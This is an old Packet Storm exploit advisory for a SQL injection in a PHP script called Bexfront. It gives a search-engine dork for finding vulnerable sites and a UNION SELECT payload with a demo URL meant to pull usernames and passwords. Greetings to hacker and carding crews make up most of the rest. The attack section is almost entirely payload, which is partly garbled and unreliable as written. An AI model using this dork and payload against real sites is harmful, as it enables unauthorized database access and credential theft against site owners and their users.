PHP Bexfront SQL Injection

2011-01-06T00:00:00
ID PACKETSTORM:97294
Type packetstorm
Reporter jos_ali_joe
Modified 2011-01-06T00:00:00

Description

                                        
                                            `==========================================  
PHP Bexfront SQL Injection Vulnerability  
==========================================  
  
[+]Title : PHP Bexfront SQL Injection Vulnerability  
[+]Software : PHP Bexfront  
[+]Vendor : NN  
[+]Download : NN  
[+]Author : jos_ali_joe  
[+]Contact : josalijoe[at]hotmail[dot]com  
[+]Web : http://alicoder.wordpress.com/ ( New Blog jos_ali_joe )  
[+]Home : http://indonesiancoder.com/ & http://explorecrew.org/  
  
  
  
.___ .___ .__ _________ .___   
| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______   
| | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \  
| || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/  
|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__|   
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/   
  
  
########################################################################  
  
Dork : inurl:"bexfront.php?sid="  
  
########################################################################  
  
------------------------------------------------------------------------  
  
SQL Exploit  
  
Exploit : +union+select(usename,char,password),null,null,null,null,+from+josalijoe--  
  
Demo   
  
Exploit :  
  
http://127.0.0.1/[path]/bexfront.php?sid=-98+union+select(usename,char,password),null,null,null,null,+from+josalijoe--  
  
--------------------------------------------------------------------------  
  
  
Greets For :  
  
./Devilzc0de crew - Kebumen Cyber - Indonesian Hacker - Tecon Crew - Magelang Cyber - Malang Cyber - kill-9   
  
./Byroe Net - Yogya Carderlink - aten4 - Wannabe Hacker - Tecon Crew - DuniaSantai.com - All Underground Forum Indonesia  
  
My Team : ./Indonesian Coder & Explore Crew  
  
Special Thanks :  
  
Security Reason - Packetstorm Security  
  
  
[+] Note :   
  
Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban.   
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban,   
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.  
  
`